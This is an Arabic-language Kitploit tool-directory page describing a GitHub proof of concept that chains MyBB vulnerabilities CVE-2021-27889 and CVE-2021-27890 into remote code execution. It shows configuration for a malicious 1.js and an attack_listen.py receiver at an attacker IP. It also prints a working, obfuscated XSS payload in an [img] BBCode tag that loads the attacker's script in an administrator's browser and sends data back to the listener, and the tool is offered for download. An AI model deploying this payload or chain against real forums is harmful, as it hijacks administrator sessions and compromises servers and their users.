Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Mybb-XSS_SQL_RCE-POC — Mybb يربط CVE-2021-27890 & CVE-2021-27889 بـ RCE poc | Kitploit
أدوات/GitHubGitHub/xiaopan233/mybb-xss_sql_rce-poc
توليد الحمولةالاستغلالاستغلال تطبيقات الويب
GitHubxiaopan233/mybb-xss_sql_rce-poc

Mybb-XSS_SQL_RCE-POC

Mybb يربط CVE-2021-27890 & CVE-2021-27889 بـ RCE poc

عرض المستودع
102منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Mybb-XSS_SQL_RCE-POC

Mybb يربط CVE-2021-27890 & CVE-2021-27889 بـ RCE poc

قبل الاستخدام:

يوجد ملفان هنا: 1.js و attack_listen.py

يجب تعديل هذين الملفين:

1.js:

عدّل رابط منتدى mybb ورابط الهجوم:

root@kitploit:~
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py

attack_listen.py

عدّل مضيف الهجوم ومنفذ الهجوم:

root@kitploit:~
attack_host = '192.168.92.165'
attack_port = 8080

الاستخدام:

CVE-2021-27889 هو xss. يجب حقن الحمولة التالية في "New Post Thread" أو "Reply" أو "Private Messages" قبل تنفيذ الهجوم. في هذا العرض التوضيحي، أرسلت الحمولة إلى "New Post Thread"

لاحظ أن 192.168.92.165 هو عنوان IP للخادم الخبيث، يجب تغييره.

root@kitploit:~
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]


الآن، تم حقن ملف js الخبيث 1.js بنجاح. ثم يجب أن ننتظر حتى يقوم مسؤول بتصفح هذا المنشور مع كookie صفحة المسؤول التي سجل الدخول بها.

لاحظ أن المستخدم المسؤول ليس بالضرورة أن يكون قد سجل الدخول إلى صفحة المنتدى.


في وقت الانتظار، يجب تشغيل "attack_listen.py" على جهاز الهجوم الخاص بنا، لتحديد ما إذا تم مهاجمة المستخدم المسؤول.

root@kitploit:~
python3 attack_listen.py

عندما يتصفح المستخدم المسؤول المنشور الخبيث، سيقوم الـ js الخبيث بتنفيذ الهجوم:


يمكننا استلام المعلومات على جهاز الهجوم الخاص بنا:

تنزيل الأداة